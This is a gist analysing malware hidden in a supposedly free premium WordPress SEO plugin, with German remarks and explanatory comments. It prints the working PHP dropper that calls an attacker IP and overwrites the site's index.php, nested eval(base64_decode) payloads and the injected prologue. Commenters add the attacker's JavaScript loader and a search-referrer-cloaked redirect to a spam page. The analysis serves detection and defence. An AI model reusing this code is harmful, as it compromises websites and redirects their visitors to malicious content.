@ocean90 /o1.txt Secret
Last active Dec 29, 2015

Analyse des Skriptes zu einem angeblich kostenlosen Premiumplugin. http://blog.wpde.org/?p=2322
<?php
// From aioseop_class.php
// $X
/* ------------------------------------------------------------------
Author: Abdul Rahman Sherzad (www.afghancybersoft.com)
Email: info@afghancybersoft.com
Biography: Abdul Rahman Sherzad was born and brought up in Herat-Afghanistan and completed my under-graduate studies
in Computer Science Faculty of Herat University in 2006 obtaining my B.C.S degree as the best outgoing senior student
from this faculty. Having intellectuality in Computer Programming and Information Database Management System, I was offered
to commence teaching in Computer Science Faculty of Herat University. After a while I joined CRS to work as the Database
Manager for the ADA program. I worked for CRS for a couple of years after which I was awarded a scholarship by the
government of Germany to pursue my Master in Information Database Management and Software Engineering in Berlin at
TU-Berlin University. I am currently also teaching at the Herat University as well as acting as the head of Information
Systems Manager both in CRS and Herat University to support the educational needs.
--------------------------------------------------------------------- */
// First line
// Call-home beacon: a plain-http GET to the attacker host as soon as this file is loaded.
// The response ($result) is not used anywhere in this fragment and the handle is never
// closed. SSL verification is switched off even though the URL is not https.
$curl = curl_init('http://91.239.15.61/info.php');
curl_setopt($curl, CURLOPT_FAILONERROR, true);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($curl);
// Second line
// Dropper: download remote content and overwrite the WordPress root index.php with it.
// Indicators to look for on an affected host: this IP in plugin files, and an index.php
// whose first lines differ from the stock WordPress file (see the copy further down).
$code_txt = 'http://91.239.15.61/o1.txt';
// The web root is taken from DOCUMENT_ROOT; the .'' forces a string ("" if the variable is unset).
$path = getenv("DOCUMENT_ROOT").'';
// The only "is this WordPress" check: three directories under the web root.
if(is_dir($path.'/wp-content') AND is_dir($path.'/wp-admin') AND is_dir($path.'/wp-includes')){
// No error handling on the download: if it fails $code is false and the write below
// presumably produces an empty index.php (false coerces to ""), taking the site down.
$code= file_get_contents($code_txt);
$index_path = $path.'/index.php';
// The return value is tested but both branches are silent, so the overwrite leaves no trace in output.
if(file_put_contents($index_path, $code)){
}
}else{
echo 'Not a wordpress Installation';
}
// http://91.239.15.61/o1.txt
/**
* Missing quotation marks.
* Otherwise repeatedly eval(base64_decode(....)):
*
* string(1279) "eval(base64_decode(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.Vm1kM1ZHeENWV0Y2VmtkVlZFWlRWbFpPVmsxVldsVk5WbHBXVkVWT1UwMUhSbGhOVjNocFRURlpkMU14VW5wYU1GSlNZakJ3UkZVeFNuSlhWbWhUWVVWc1JVMUhaRnBOTVZvMVdXdFpOV0pIVmtoV2JYQk1VVEZLY1ZsVlRuSk9NR3hFVVZVMVJGb3lkRXRYVkU1WFpWZEtSMDlYY0dsU2VtdzJWMnhPYm1FeGEzbGFNMEpRWlZWR1QxRXlaSEpUYkhCWVZHMDVhV1ZWUm5CVGEyUlRZVWRTU0ZKWGJGQmtla0pNVVRGbmQxUnJUbkJQU0ZwUi5aV3BTVDFFeVkzQkxWSE1wS1RzKSk7));"
* string(942) "eval(base64_decode(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.ZWpST1EyY3BLVHMpKTs));"
* string(689) "eval(base64_decode(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));"
* string(500) "eval(base64_decode(Ly88P3BocA0KCWlmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0JykpDQoJew0KCQkkdXJsID0gImh0dHA6Ly85MS4yMzkuMTUuNjEvamF2YS9nb29nbGUucGhwIjsgDQoJCSRjaCA9IGN1cmxfaW5pdCgpOyAgDQoJCSR0aW1lb3V0ID0gNTsgIA0KCQljdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9VUkwsJHVybCk7IA0KCQljdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTsgDQoJCWN1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCR0aW1lb3V0KTsgDQoJCSRkYXRhID0gY3VybF9leGVjKCRjaCk7ICANCgkJY3VybF9jbG9zZSgkY2gpOyANCgkJZWNobyAiJGRhdGEiOw0KCX0NCi8vPz4NCg));"
* =>
*/
//<?php
// Innermost layer after peeling the nested eval(base64_decode()) wrappers above.
// On every request it fetches a page from the attacker host (5 s connect timeout,
// no read timeout) and echoes the response into the output unescaped, so whatever
// that host serves becomes part of the site's HTML. The content seen at the time of
// the analysis is reproduced in the comments below.
if(function_exists('curl_init'))
{
$url = "http://91.239.15.61/java/google.php";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
// Remote-controlled injection point: no escaping, no content check.
echo "$data";
}
// Note: a closing tag inside a one-line comment still ends PHP mode, so the line below leaves PHP here.
//?>
<?php /* Injected prologue found at the top of the overwritten index.php: output buffering is started, then the next tag evals a base64 string assembled from two concatenated literals (the decoded layers are listed in the analysis above). Presence of this pair at the top of index.php is the on-disk indicator of the infection. */ ob_start(); ?>
<? /* Short open tag, so this only runs where short_open_tag is enabled. */ eval(base64_decode(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.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)); ?>
<?php
// Everything from here on matches the stock WordPress index.php; the two tags above are
// the only addition, so the site keeps rendering normally and the change is easy to miss.
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');

dasllama commented Dec 1, 2013

Das steht in der google.php:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script type="text/javascript">
<!--
// Injects the second-stage script from the attacker host unless the 'doRedirect'
// marker cookie is already present (readCookie() returns null when it is not).
function redirect()
{
var thecookie = readCookie('doRedirect');
if(!thecookie)
{
     // Appends <script src="http://91.239.15.61/google.js"> to <head>; the referrer-based
     // redirect logic lives in that file (reproduced further down on this page).
     var head=document.getElementsByTagName('head')[0]
      var script=document.createElement('script')
       script.setAttribute('type', 'text/javascript')
       script.setAttribute('src', "http://91.239.15.61/google.js")
       head.appendChild(script)
}
}

// Cookie helper used by window.onload to record that the loader has run.
function createCookie(name,value,days)
{
if (days)
{
var date = new Date();
// Not a days-to-milliseconds conversion (that would be days*24*60*60*1000). With the
// days='999' passed below the offset is roughly 4.7e16 ms, beyond the representable
// Date range, so toGMTString() presumably yields "Invalid Date" and browsers would
// drop the expires attribute, leaving a session cookie — TODO confirm. If so, the
// injection re-runs on every new browser session rather than once.
date.setTime(date.getTime()+(days*3600*3600*3600*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

// Returns the value of cookie `name` from document.cookie, or null when it is absent.
function readCookie(name)
{
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++)
{
var c = ca[i];
// Strip the space that follows each ';' separator.
while (c.charAt(0)==' ') c = c.substring(1,c.length);
// Prefix match: a cookie whose name merely starts with `name` would match too.
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}

// Entry point: inject the loader first, then set the marker cookie so redirect()
// skips the injection on later loads (subject to the expiry caveat in createCookie).
window.onload = function()
{
redirect();
createCookie('doRedirect','true','999');
}
//-->
</script>
</head>

<body>
</body>
</html>

dasllama commented Dec 1, 2013

Und das in der google.js:

    // Referrer-gated ("cloaked") redirect: only visitors whose referrer contains one of
    // the listed search-engine names are sent to http://91.239.15.61/g.php, and only on
    // their first such visit (checkCookie() sets a 730-day marker). Direct visits — for
    // example the site owner checking the page — never trigger it, so reproducing the
    // symptom needs a search-engine referrer and a browser without that cookie.
    var from = document.referrer;
    var i;
    var se = ["google", "yahoo", "bing", "yandex" , "baidu", "gigablast", "soso", "blekko", "exalead", "sogou", "duckduckgo", "volunia"];
    for (i = 0; i < se.length; ++i) {
        // indexOf()+1 is truthy for any match, including position 0: a plain substring test.
        if (from.indexOf(se[i]) + 1) {
            if (!checkCookie()) {
                window.location = "http://91.239.15.61/g.php";
            }
        }
    }

    // Returns the unescaped value of cookie `c_name` from document.cookie, or null when absent.
    function getCookie(c_name) {
        var c_value = document.cookie;
        // First look for the name preceded by a space (not the first cookie), then at any position.
        var c_start = c_value.indexOf(" " + c_name + "=");
        if (c_start == -1) {
            c_start = c_value.indexOf(c_name + "=");
        }
        if (c_start == -1) {
            c_value = null;
        }
        else {
            // Value runs from just after '=' to the next ';' or the end of the string.
            c_start = c_value.indexOf("=", c_start) + 1;
            var c_end = c_value.indexOf(";", c_start);
            if (c_end == -1) {
                c_end = c_value.length;
            }
            c_value = unescape(c_value.substring(c_start, c_end));
        }
        return c_value;
    }

    // Writes cookie `c_name` with an escape()d value; `exdays` days of validity, or a
    // session cookie when exdays is null. No path attribute, so it is scoped to the current path.
    function setCookie(c_name, value, exdays) {
        var exdate = new Date();
        exdate.setDate(exdate.getDate() + exdays);
        var c_value = escape(value) + ((exdays == null) ? "" : "; expires=" + exdate.toUTCString());
        document.cookie = c_name + "=" + c_value;
    }

    // Returns true if the marker cookie is already set; otherwise sets it for 730 days
    // and returns false. Called from the redirect loop above, so a visitor is redirected
    // at most once per browser — which also makes the behaviour hard to reproduce on a
    // second visit. Clearing the 'referrerRedirectCookie' cookie re-arms it.
    function checkCookie() {
        var referrerRedirectCookie = getCookie("referrerRedirectCookie");
        if (referrerRedirectCookie != null && referrerRedirectCookie != "") {
            return true;
        }
        else {
            setCookie("referrerRedirectCookie", "do not redirect", 730);
            return false;
        }
    }

Die http://91.239.15.61/g.php sollte nicht aufgerufen werden. Das ist Porn-Spam.
